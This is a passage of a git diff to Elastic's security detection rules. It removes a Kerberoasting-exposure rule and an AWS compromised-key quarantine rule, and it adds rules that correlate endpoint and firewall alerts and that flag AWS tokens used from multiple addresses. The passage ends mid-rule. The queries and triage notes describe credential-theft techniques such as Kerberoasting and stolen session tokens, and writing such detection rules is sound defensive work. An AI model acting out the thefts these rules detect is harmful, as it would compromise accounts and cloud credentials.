a/packages/security_detection_engine/kibana/security_rule/0b2f3da5-b5ec-47d1-908b-6ebb74814289_216.json b/packages/security_detection_engine/kibana/security_rule/0b2f3da5-b5ec-47d1-908b-6ebb74814289_216.json deleted file mode 100644 index 25490c7c430..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/0b2f3da5-b5ec-47d1-908b-6ebb74814289_216.json +++ /dev/null @@ -1,102 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Detects when a user account has the servicePrincipalName attribute modified. Attackers can abuse write privileges over a user to configure Service Principle Names (SPNs) so that they can perform Kerberoasting. Administrators can also configure this for legitimate purposes, exposing the account to Kerberoasting.", - "from": "now-9m", - "index": [ - "winlogbeat-*", - "logs-system.security*", - "logs-windows.forwarded*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "User account exposed to Kerberoasting", - "note": "## Triage and analysis\n\n### Investigating User account exposed to Kerberoasting\n\nService Principal Names (SPNs) are names by which Kerberos clients uniquely identify service instances for Kerberos target computers.\n\nBy default, only computer accounts have SPNs, which creates no significant risk, since machine accounts have a default domain policy that rotates their passwords every 30 days, and the password is composed of 120 random characters, making them invulnerable to Kerberoasting.\n\nA user account with an SPN assigned is considered a service account, and is accessible to the entire domain. If any user in the directory requests a ticket-granting service (TGS), the domain controller will encrypt it with the secret key of the account executing the service. An attacker can potentially perform a Kerberoasting attack with this information, as the human-defined password is likely to be less complex.\n\nFor scenarios where SPNs cannot be avoided on user accounts, Microsoft provides the Group Managed Service Accounts (gMSA) feature, which ensures that account passwords are robust and changed regularly and automatically. More information can be found [here](https://docs.microsoft.com/en-us/windows-server/security/group-managed-service-accounts/group-managed-service-accounts-overview).\n\nAttackers can also perform \"Targeted Kerberoasting\", which consists of adding fake SPNs to user accounts that they have write privileges to, making them potentially vulnerable to Kerberoasting.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate if the target account is a member of privileged groups (Domain Admins, Enterprise Admins, etc.).\n- Investigate if tickets have been requested for the target account.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- The use of user accounts as service accounts is a bad security practice and should not be allowed in the domain. The security team should map and monitor any potential benign true positive (B-TP), especially if the account is privileged. Domain Administrators that define this kind of setting can put the domain at risk as user accounts don't have the same security standards as computer accounts (which have long, complex, random passwords that change frequently), exposing them to credential cracking attacks (Kerberoasting, brute force, etc.).\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. Prioritize privileged accounts.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", - "query": "event.code:5136 and winlog.event_data.OperationType:\"%%14674\" and\n winlog.event_data.ObjectClass:\"user\" and\n winlog.event_data.AttributeLDAPDisplayName:\"servicePrincipalName\"\n", - "references": [ - "https://www.thehacker.recipes/ad/movement/access-controls/targeted-kerberoasting", - "https://www.qomplx.com/qomplx-knowledge-kerberoasting-attacks-explained/", - "https://www.thehacker.recipes/ad/movement/kerberos/kerberoast", - "https://attack.stealthbits.com/cracking-kerberos-tgs-tickets-using-kerberoasting", - "https://adsecurity.org/?p=280", - "https://github.com/OTRF/Set-AuditRule" - ], - "related_integrations": [ - { - "package": "system", - "version": "^1.64.0" - }, - { - "package": "windows", - "version": "^2.5.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.code", - "type": "keyword" - }, - { - "ecs": false, - "name": "winlog.event_data.AttributeLDAPDisplayName", - "type": "unknown" - }, - { - "ecs": false, - "name": "winlog.event_data.ObjectClass", - "type": "unknown" - }, - { - "ecs": false, - "name": "winlog.event_data.OperationType", - "type": "unknown" - } - ], - "risk_score": 73, - "rule_id": "0b2f3da5-b5ec-47d1-908b-6ebb74814289", - "setup": "## Setup\n\nThe 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```\n\nThe above policy does not cover User objects, so set up an AuditRule using https://github.com/OTRF/Set-AuditRule.\nAs this specifies the servicePrincipalName Attribute GUID, it is expected to be low noise.\n\n```\nSet-AuditRule -AdObjectPath 'AD:\\CN=Users,DC=Domain,DC=com' -WellKnownSidType WorldSid -Rights WriteProperty -InheritanceFlags Children -AttributeGUID f3a64788-5306-11d1-a9c5-0000f80367c1 -AuditFlags Success\n```\n", - "severity": "high", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Data Source: Active Directory", - "Resources: Investigation Guide", - "Use Case: Active Directory Monitoring", - "Data Source: Windows Security Event Logs" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0006", - "name": "Credential Access", - "reference": "https://attack.mitre.org/tactics/TA0006/" - }, - "technique": [ - { - "id": "T1558", - "name": "Steal or Forge Kerberos Tickets", - "reference": "https://attack.mitre.org/techniques/T1558/", - "subtechnique": [ - { - "id": "T1558.003", - "name": "Kerberoasting", - "reference": "https://attack.mitre.org/techniques/T1558/003/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 216 - }, - "id": "0b2f3da5-b5ec-47d1-908b-6ebb74814289_216", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0b79f5c0-2c31-4fea-86cd-e62644278205_2.json b/packages/security_detection_engine/kibana/security_rule/0b79f5c0-2c31-4fea-86cd-e62644278205_2.json deleted file mode 100644 index 69bf6fe06da..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/0b79f5c0-2c31-4fea-86cd-e62644278205_2.json +++ /dev/null @@ -1,88 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "This rule looks for use of the IAM `AttachUserPolicy` API operation to attach the `CompromisedKeyQuarantine` or `CompromisedKeyQuarantineV2` AWS managed policies to an existing IAM user. This policy denies access to certain actions and is applied by the AWS team in the event that an IAM user's credentials have been compromised or exposed publicly.", - "false_positives": [ - "This is an intentional action taken by AWS in the event of compromised credentials. Follow the instructions specified in the support case created for you regarding this event." - ], - "from": "now-6m", - "index": [ - "filebeat-*", - "logs-aws.cloudtrail-*" - ], - "language": "eql", - "license": "Elastic License v2", - "name": "AWS IAM CompromisedKeyQuarantine Policy Attached to User", - "note": "## Triage and analysis\n\n### Investigating AWS IAM CompromisedKeyQuarantine Policy Attached to User\n\nThe AWS IAM `CompromisedKeyQuarantine` and `CompromisedKeyQuarantineV2` managed policies deny certain action and is applied by the AWS team to a user with exposed credentials.\nThis action is accompanied by a support case which specifies instructions to follow before detaching the policy.\n\n#### Possible Investigation Steps\n\n- **Identify Potentially Compromised Identity**: Review the `userName` parameter of the `aws.cloudtrail.request_parameters` to determine the quarantined IAM entity.\n- **Contextualize with AWS Support Case**: Review any information from AWS comtaining additional information about the quarantined account and the reasoning for quarantine.\n- **Follow Support Case Instructions**: Do not revert the quarantine policy attachment or delete the compromised keys. Instead folow the instructions given in your support case.\n- **Correlate with Other Activities**: Search for related CloudTrail events before and after this change to see if the same actor or IP address engaged in potentially suspicious activities.\n- **Interview Relevant Personnel**: If the compromised key belongs to a user, verify the intent and authorization for these correlated actions with the person or team responsible for managing the compromised key.\n\n### False Positive Analysis\n\n- There shouldn't be many false positives related to this action as it is inititated by AWS in response to compromised or publicly exposed credentials.\n\n### Response and Remediation\n\n- **Immediate Review and Reversal**: Update the user IAM permissions to remove the quarantine policy and disable the compromised credentials.\n- **Policy Update**: Review and possibly update your organization\u2019s policies on credential storage to tighten control and prevent public exposure.\n- **Incident Response**: If malicious intent is confirmed, consider it a data breach incident and initiate the incident response protocol. This includes further investigation, containment, and recovery.\n\n### Additional Information:\n\nFor further guidance on managing and securing credentials in AWS environments, refer to the [AWS IAM User Guide](https://docs.aws.amazon.com/IAM/latest/UserGuide/best-practices.html) regarding security best practices and guidance on [Remediating Potentially Compromised AWS Credentials](https://docs.aws.amazon.com/guardduty/latest/ug/compromised-creds.html).\n", - "query": "any where event.dataset == \"aws.cloudtrail\"\n and event.action == \"AttachUserPolicy\"\n and event.outcome == \"success\"\n and stringContains(aws.cloudtrail.request_parameters, \"AWSCompromisedKeyQuarantine\")\n", - "references": [ - "https://docs.aws.amazon.com/aws-managed-policy/latest/reference/AWSCompromisedKeyQuarantine.html/", - "https://docs.aws.amazon.com/aws-managed-policy/latest/reference/AWSCompromisedKeyQuarantineV2.html/" - ], - "related_integrations": [ - { - "integration": "cloudtrail", - "package": "aws", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "aws.cloudtrail.request_parameters", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - } - ], - "risk_score": 73, - "rule_id": "0b79f5c0-2c31-4fea-86cd-e62644278205", - "severity": "high", - "tags": [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS IAM", - "Resources: Investigation Guide", - "Use Case: Identity and Access Audit", - "Tactic: Credential Access" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0006", - "name": "Credential Access", - "reference": "https://attack.mitre.org/tactics/TA0006/" - }, - "technique": [ - { - "id": "T1552", - "name": "Unsecured Credentials", - "reference": "https://attack.mitre.org/techniques/T1552/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "eql", - "version": 2 - }, - "id": "0b79f5c0-2c31-4fea-86cd-e62644278205_2", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0bca7e73-e1b5-4fb2-801b-9b5f5be20dfe_2.json b/packages/security_detection_engine/kibana/security_rule/0bca7e73-e1b5-4fb2-801b-9b5f5be20dfe_2.json new file mode 100644 index 00000000000..6b263ae7ec6 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0bca7e73-e1b5-4fb2-801b-9b5f5be20dfe_2.json @@ -0,0 +1,91 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule correlate any Elastic Defend alert with a set of suspicious events from Network security devices like Palo Alto Networks (PANW) and Fortinet Fortigate by host.ip and source.ip. This may indicate that this host is compromised and triggering multi-datasource alerts.", + "from": "now-60m", + "interval": "10m", + "language": "esql", + "license": "Elastic License v2", + "name": "Elastic Defend and Network Security Alerts Correlation", + "note": "## Triage and analysis\n\n### Investigating Elastic Defend and Network Security Alerts Correlation\n\nThis rule correlate any Elastic Defend alert with suspicious events from Network Security datasources like Palo Alto Networks (PANW), Fortinet Fortigate and Suricata by host.ip and source.ip.\n\n### Possible investigation steps\n\n- Review the alert details to identify the specific host and users involved.\n- Investiguate the network alerts by destination.ip and message.\n- Examine the timeline of the alerts to understand the sequence of events and determine if there is a pattern or progression in the tactics used.\n- Correlate the alert data with other logs and telemetry from the host, such as process creation, network connections, and file modifications, to gather additional context.\n- Check for any indicators of compromise (IOCs) associated with the alerts, such as suspicious IP addresses, domains, or file hashes, and search for these across the network.\n- Assess the impact and scope of the potential compromise by determining if other hosts or systems have similar alerts or related activity.\n\n### False positive analysis\n\n- IP address ranges overlap where the host.ip value from the Elastic Defend alert is unrelated to the source.ip value from the Network Security alert.\n- Alerts from routine administrative tasks may trigger multiple alerts. Review and exclude known benign activities such as scheduled software updates or system maintenance.\n- Security tools running on the host might generate alerts across different tactics. Identify and exclude alerts from trusted security applications to reduce noise.\n- Automated scripts or batch processes can mimic adversarial behavior. Analyze and whitelist these processes if they are verified as non-threatening.\n- Frequent alerts from development or testing environments can be misleading. Consider excluding these environments from the rule or applying a different risk score.\n- User behavior anomalies, such as accessing multiple systems or applications, might trigger alerts. Implement user behavior baselines to differentiate between normal and suspicious activities.\n\n### Response and remediation\n\n- Isolate the affected host from the network immediately to prevent further lateral movement by the adversary.\n- Conduct a thorough forensic analysis of the host to identify the specific vulnerabilities exploited and gather evidence of the attack phases involved.\n- Remove any identified malicious software or unauthorized access tools from the host, ensuring all persistence mechanisms are eradicated.\n- Apply security patches and updates to the host to address any exploited vulnerabilities and prevent similar attacks.\n- Restore the host from a known good backup if necessary, ensuring that the backup is free from compromise.\n- Monitor the host and network for any signs of re-infection or further suspicious activity, using enhanced logging and alerting based on the identified attack patterns.\n- Escalate the incident to the appropriate internal or external cybersecurity teams for further investigation and potential legal action if the attack is part of a larger campaign.", + "query": "FROM logs-* metadata _id\n| WHERE\n // Elastic Defend Alerts\n (event.module == \"endpoint\" and event.dataset == \"endpoint.alerts\") or\n\n // PANW suspicious events\n (event.dataset == \"panw.panos\" and\n event.action in (\"virus_detected\", \"wildfire_virus_detected\", \"c2_communication\", \"spyware_detected\", \"large_upload\", \"denied\", \"exploit_detected\")) or\n\n // Fortigate suspicious events\n (event.dataset == \"fortinet_fortigate.log\" and\n (event.action in (\"outbreak-prevention\", \"deny\", \"infected\", \"blocked\") or message like \"backdoor*\" or message like \"Proxy*\" or message like \"anomaly*\" or message like \"P2P*\" or message like \"misc*\" or message like \"DNS.Over.HTTPS\" or message like \"Remote.Access\")) or\n\n // Suricata\n (event.dataset == \"suricata.eve\" and message in (\"Command and Control Traffic\", \"Potentially Bad Traffic\", \"A Network Trojan was detected\", \"Detection of a Network Scan\", \"Domain Observed Used for C2 Detected\", \"Malware Command and Control Activity Detected\"))\n\n// extract source.ip from PANW or Fortigate events and host.ip from Elastic Defend alert\n|eval fw_alert_source_ip = CASE(event.dataset in (\"panw.panos\", \"fortinet_fortigate.log\"), source.ip, null),\n elastic_defend_alert_host_ip = CASE(event.module == \"endpoint\" and event.dataset == \"endpoint.alerts\", host.ip, null)\n| eval Esql.source_ip = COALESCE(fw_alert_source_ip, elastic_defend_alert_host_ip)\n| where Esql.source_ip is not null\n\n// group by host_source_ip shared between FG/PANW and Elastic Defend\n| stats Esql.alerts_count = COUNT(*),\n Esql.event_module_distinct_count = COUNT_DISTINCT(event.module),\n Esql.event_module_values = VALUES(event.module),\n Esql.message_values = VALUES(message),\n Esql.event_action_values = VALUES(event.action),\n Esql.process_executable_values = VALUES(process.executable),\n Esql.host_id_values = VALUES(host.id),\n Esql.user_name_values = VALUES(user.name),\n Esql.destination_ip_values = VALUES(destination.ip)\n by Esql.source_ip\n| where Esql.event_module_distinct_count >= 2\n| eval concat_module_values = MV_CONCAT(Esql.event_module_values, \",\")\n// Make sure an endpoint alert is present along one of the network ones\n| where concat_module_values like \"*endpoint*\"\n| keep Esql.alerts_count, Esql.source_ip, Esql.destination_ip_values, Esql.host_id_values, Esql.user_name_values, Esql.event_module_values, Esql.message_values, Esql.process_executable_values\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^9.0.0" + }, + { + "package": "panw", + "version": "^5.2.0" + }, + { + "package": "fortinet_fortigate", + "version": "^1.31.0" + }, + { + "package": "suricata", + "version": "^2.24.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "Esql.alerts_count", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.destination_ip_values", + "type": "ip" + }, + { + "ecs": false, + "name": "Esql.event_module_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.host_id_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.message_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.process_executable_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.source_ip", + "type": "ip" + }, + { + "ecs": false, + "name": "Esql.user_name_values", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "0bca7e73-e1b5-4fb2-801b-9b5f5be20dfe", + "severity": "high", + "tags": [ + "Use Case: Threat Detection", + "Rule Type: Higher-Order Rule", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Fortinet", + "Data Source: PAN-OS" + ], + "timestamp_override": "event.ingested", + "type": "esql", + "version": 2 + }, + "id": "0bca7e73-e1b5-4fb2-801b-9b5f5be20dfe_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0c3c80de-08c2-11f0-bd11-f661ea17fbcc_5.json b/packages/security_detection_engine/kibana/security_rule/0c3c80de-08c2-11f0-bd11-f661ea17fbcc_5.json index 6511aa4f060..ac516a9e88d 100644 --- a/packages/security_detection_engine/kibana/security_rule/0c3c80de-08c2-11f0-bd11-f661ea17fbcc_5.json +++ b/packages/security_detection_engine/kibana/security_rule/0c3c80de-08c2-11f0-bd11-f661ea17fbcc_5.json @@ -42,7 +42,7 @@ "related_integrations": [ { "package": "o365", - "version": "^2.11.0" + "version": "^3.0.0" } ], "required_fields": [ diff --git a/packages/security_detection_engine/kibana/security_rule/0ce6487d-8069-4888-9ddd-61b52490cebc_211.json b/packages/security_detection_engine/kibana/security_rule/0ce6487d-8069-4888-9ddd-61b52490cebc_211.json index 3f42ebab557..b2fe626d942 100644 --- a/packages/security_detection_engine/kibana/security_rule/0ce6487d-8069-4888-9ddd-61b52490cebc_211.json +++ b/packages/security_detection_engine/kibana/security_rule/0ce6487d-8069-4888-9ddd-61b52490cebc_211.json @@ -39,7 +39,7 @@ "related_integrations": [ { "package": "o365", - "version": "^2.11.0" + "version": "^3.0.0" } ], "required_fields": [ diff --git a/packages/security_detection_engine/kibana/security_rule/0d92d30a-5f3e-4b71-bc3d-4a0c4914b7e0_105.json b/packages/security_detection_engine/kibana/security_rule/0d92d30a-5f3e-4b71-bc3d-4a0c4914b7e0_105.json new file mode 100644 index 00000000000..0e9ac008fa7 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0d92d30a-5f3e-4b71-bc3d-4a0c4914b7e0_105.json @@ -0,0 +1,211 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule identifies potentially suspicious activity by detecting instances where a single IAM user's temporary session token is accessed from multiple IP addresses within a short time frame. Such behavior may suggest that an adversary has compromised temporary credentials and is utilizing them from various locations. To enhance detection accuracy and minimize false positives, the rule incorporates criteria that evaluate unique IP addresses, user agents, cities, and networks. These additional checks help distinguish between legitimate distributed access patterns and potential credential misuse. Detected activities are classified into different types based on the combination of unique indicators, with each classification assigned a fidelity score reflecting the likelihood of malicious behavior. High fidelity scores are given to patterns most indicative of threats, such as multiple unique IPs, networks, cities, and user agents. Medium and low fidelity scores correspond to less severe patterns, enabling security teams to effectively prioritize alerts.", + "false_positives": [ + "Highly distributed environments (e.g., globally deployed automation or edge nodes) may cause a single IAM user to appear from multiple IPs. Review the geolocation, network context, and user agent patterns to rule out benign use." + ], + "from": "now-32m", + "interval": "5m", + "investigation_fields": { + "field_names": [ + "Esql.timestamp_first_seen", + "Esql.timestamp_last_seen", + "Esql.activity_type", + "Esql.activity_fidelity_score", + "Esql.event_count", + "Esql.aws_cloudtrail_user_identity_arn_values", + "Esql.aws_cloudtrail_user_identity_access_key_id_values", + "Esql.event_action_values", + "Esql.event_provider_values", + "Esql.source_ip_values", + "Esql.user_agent_original_values", + "Esql.source_ip_user_agent_pair_values", + "Esql.source_geo_city_name_values", + "Esql.source_ip_city_pair_values", + "Esql.source_network_org_name_values", + "Esql.source_ip_network_pair_values", + "Esql.source_ip_count_distinct", + "Esql.user_agent_original_count_distinct", + "Esql.source_geo_city_name_count_distinct", + "Esql.source_network_org_name_count_distinct", + "Esql.data_stream_namespace_values" + ] + }, + "language": "esql", + "license": "Elastic License v2", + "name": "AWS Access Token Used from Multiple Addresses", + "note": "## Triage and Analysis\n\n### Investigating AWS Access Token Used from Multiple Addresses\n\nAccess tokens are bound to a single user. Usage from multiple IP addresses may indicate the token was stolen and used elsewhere. By correlating this with additional detection criteria like multiple user agents, different cities, and different networks, we can improve the fidelity of the rule and help to eliminate false positives associated with expected behavior, like dual-stack IPV4/IPV6 usage.\n\n#### Possible investigation steps\n\n- **Identify the IAM User**: Examine the `aws.cloudtrail.user_identity.arn` stored in `user_id` and correlate with the `source.ips` stored in `ip_list` and `unique_ips` count to determine how widely the token was used.\n- **Correlate Additional Detection Context**: Examine `activity_type` and `fidelity_score` to determine additional cities, networks or user agents associated with the token usage.\n- **Determine Access Key Type**: Examine the `access_key_id` to determine whether the token is short-term (beginning with ASIA) or long-term (beginning with AKIA).\n- **Check Recent MFA Events**: Determine whether the user recently enabled MFA, registered devices, or assumed a role using this token.\n- **Review Workload Context**: Confirm whether the user was expected to be active across multiple cities, networks or user agent environments.\n- **Trace Adversary Movement**: Pivot to related actions (e.g., `s3:ListBuckets`, `iam:ListUsers`, `sts:GetCallerIdentity`) to track further enumeration.\n\n### False positive analysis\n\n- Automation frameworks that rotate through multiple IPs or cloud functions with dynamic egress IPs may cause this alert to fire.\n- Confirm geolocation and workload context before escalating.\n\n### Response and remediation\n\n- **Revoke the Token**: Disable or rotate the IAM credentials and invalidate the temporary session token.\n- **Audit the Environment**: Look for signs of lateral movement or data access during the token's validity.\n- **Strengthen Controls**: Require MFA for high-privilege actions, restrict access via policy conditions (e.g., IP range or device).\n\n### Additional information\n\n- [IAM Long-Term Credentials](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_access-keys.html)\n- [STS Temporary Credentials](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp.html)\n- [Using MFA with Temporary Credentials](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp_enable-regions.html)\n- [AWS Threat Detection Use Cases](https://docs.aws.amazon.com/securityhub/latest/userguide/securityhub-standards-fsbp-controls.html)\n", + "query": "from logs-aws.cloudtrail* metadata _id, _version, _index\n| where @timestamp > now() - 30 minutes\n and event.dataset == \"aws.cloudtrail\"\n and aws.cloudtrail.user_identity.arn is not null\n and aws.cloudtrail.user_identity.type == \"IAMUser\"\n and source.ip is not null\n and aws.cloudtrail.user_identity.access_key_id is not null\n and not (\n user_agent.original like \"*Terraform*\" or\n user_agent.original like \"*Ansible*\" or\n user_agent.original like \"*Pulumi*\"\n )\n and `source.as.organization.name` != \"AMAZON-AES\"\n and not ((\n `source.as.organization.name` == \"AMAZON-02\" and aws.cloudtrail.event_category == \"Data\"))\n and event.provider not in (\n \"health.amazonaws.com\", \"monitoring.amazonaws.com\", \"notifications.amazonaws.com\",\n \"ce.amazonaws.com\", \"cost-optimization-hub.amazonaws.com\",\n \"servicecatalog-appregistry.amazonaws.com\", \"securityhub.amazonaws.com\", \n \"account.amazonaws.com\", \"budgets.amazonaws.com\", \"freetier.amazonaws.com\", \"support.amazonaws.com\",\n \"support-console.amazonaws.com\"\n )\n\n| eval\n Esql.time_window_date_trunc = date_trunc(30 minutes, @timestamp),\n Esql.aws_cloudtrail_user_identity_arn = aws.cloudtrail.user_identity.arn,\n Esql.aws_cloudtrail_user_identity_access_key_id = aws.cloudtrail.user_identity.access_key_id,\n Esql.source_ip = source.ip,\n Esql.user_agent_original = user_agent.original,\n Esql.source_ip_string = to_string(source.ip),\n Esql.source_ip_user_agent_pair = concat(Esql.source_ip_string, \" - \", user_agent.original),\n Esql.source_ip_city_pair = concat(Esql.source_ip_string, \" - \", source.geo.city_name),\n Esql.source_geo_city_name = source.geo.city_name,\n Esql.source_network_org_name = `source.as.organization.name`,\n Esql.source_ip_network_pair = concat(Esql.source_ip_string, \"-\", `source.as.organization.name`),\n Esql.event_timestamp = @timestamp,\n Esql.data_stream_namespace = data_stream.namespace\n\n| stats\n Esql.event_action_values = values(event.action),\n Esql.event_provider_values = values(event.provider),\n Esql.aws_cloudtrail_user_identity_access_key_id_values = values(Esql.aws_cloudtrail_user_identity_access_key_id),\n Esql.aws_cloudtrail_user_identity_arn_values = values(Esql.aws_cloudtrail_user_identity_arn),\n Esql.source_ip_values = values(Esql.source_ip),\n Esql.user_agent_original_values = values(Esql.user_agent_original),\n Esql.source_ip_user_agent_pair_values = values(Esql.source_ip_user_agent_pair),\n Esql.source_geo_city_name_values = values(Esql.source_geo_city_name),\n Esql.source_ip_city_pair_values = values(Esql.source_ip_city_pair),\n Esql.source_network_org_name_values = values(Esql.source_network_org_name),\n Esql.source_ip_network_pair_values = values(Esql.source_ip_network_pair),\n Esql.source_ip_count_distinct = count_distinct(Esql.source_ip),\n Esql.user_agent_original_count_distinct = count_distinct(Esql.user_agent_original),\n Esql.source_geo_city_name_count_distinct = count_distinct(Esql.source_geo_city_name),\n Esql.source_network_org_name_count_distinct = count_distinct(Esql.source_network_org_name),\n Esql.data_stream_namespace_values = values(Esql.data_stream_namespace),\n Esql.timestamp_first_seen = min(Esql.event_timestamp),\n Esql.timestamp_last_seen = max(Esql.event_timestamp),\n Esql.event_count = count()\n by Esql.time_window_date_trunc, Esql.aws_cloudtrail_user_identity_access_key_id\n\n| eval\n Esql.activity_type = case(\n Esql.source_ip_count_distinct >= 2 and Esql.source_network_org_name_count_distinct >= 2 and Esql.source_geo_city_name_count_distinct >= 2 and Esql.user_agent_original_count_distinct >= 2, \"multiple_ip_network_city_user_agent\",\n Esql.source_ip_count_distinct >= 2 and Esql.source_network_org_name_count_distinct >= 2 and Esql.source_geo_city_name_count_distinct >= 2, \"multiple_ip_network_city\",\n Esql.source_ip_count_distinct >= 2 and Esql.source_geo_city_name_count_distinct >= 2, \"multiple_ip_and_city\",\n Esql.source_ip_count_distinct >= 2 and Esql.source_network_org_name_count_distinct >= 2, \"multiple_ip_and_network\",\n Esql.source_ip_count_distinct >= 2 and Esql.user_agent_original_count_distinct >= 2, \"multiple_ip_and_user_agent\",\n \"normal_activity\"\n ),\n Esql.activity_fidelity_score = case(\n Esql.activity_type == \"multiple_ip_network_city_user_agent\", \"high\",\n Esql.activity_type == \"multiple_ip_network_city\", \"high\",\n Esql.activity_type == \"multiple_ip_and_city\", \"medium\",\n Esql.activity_type == \"multiple_ip_and_network\", \"medium\",\n Esql.activity_type == \"multiple_ip_and_user_agent\", \"low\"\n )\n\n| keep\n Esql.time_window_date_trunc,\n Esql.activity_type,\n Esql.activity_fidelity_score,\n Esql.event_count,\n Esql.timestamp_first_seen,\n Esql.timestamp_last_seen,\n Esql.aws_cloudtrail_user_identity_arn_values,\n Esql.aws_cloudtrail_user_identity_access_key_id_values,\n Esql.event_action_values,\n Esql.event_provider_values,\n Esql.source_ip_values,\n Esql.user_agent_original_values,\n Esql.source_ip_user_agent_pair_values,\n Esql.source_geo_city_name_values,\n Esql.source_ip_city_pair_values,\n Esql.source_network_org_name_values,\n Esql.source_ip_network_pair_values,\n Esql.source_ip_count_distinct,\n Esql.user_agent_original_count_distinct,\n Esql.source_geo_city_name_count_distinct,\n Esql.source_network_org_name_count_distinct,\n Esql.data_stream_namespace_values\n\n| where Esql.activity_fidelity_score == \"high\"\n\n// this rule only alerts for \"high\" fidelity cases, to broaden the rule scope to include all activity\n// change the final condition to \n// | where Esql.activity_type != \"normal_activity\"\n\n", + "references": [ + "https://www.sygnia.co/blog/sygnia-investigation-bybit-hack/" + ], + "related_integrations": [ + { + "package": "aws", + "version": "^3.0.0" + }, + { + "integration": "cloudtrail", + "package": "aws", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "Esql.activity_fidelity_score", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.activity_type", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.aws_cloudtrail_user_identity_access_key_id_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.aws_cloudtrail_user_identity_arn_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.data_stream_namespace_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.event_action_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.event_count", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.event_provider_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.source_geo_city_name_count_distinct", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.source_geo_city_name_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.source_ip_city_pair_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.source_ip_count_distinct", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.source_ip_network_pair_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.source_ip_user_agent_pair_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.source_ip_values", + "type": "ip" + }, + { + "ecs": false, + "name": "Esql.source_network_org_name_count_distinct", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.source_network_org_name_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.time_window_date_trunc", + "type": "date" + }, + { + "ecs": false, + "name": "Esql.timestamp_first_seen", + "type": "date" + }, + { + "ecs": false, + "name": "Esql.timestamp_last_seen", + "type": "date" + }, + { + "ecs": false, + "name": "Esql.user_agent_original_count_distinct", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.user_agent_original_values", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "0d92d30a-5f3e-4b71-bc3d-4a0c4914b7e0", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS IAM", + "Data Source: AWS CloudTrail", + "Tactic: Initial Access", + "Use Case: Identity and Access Audit", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": 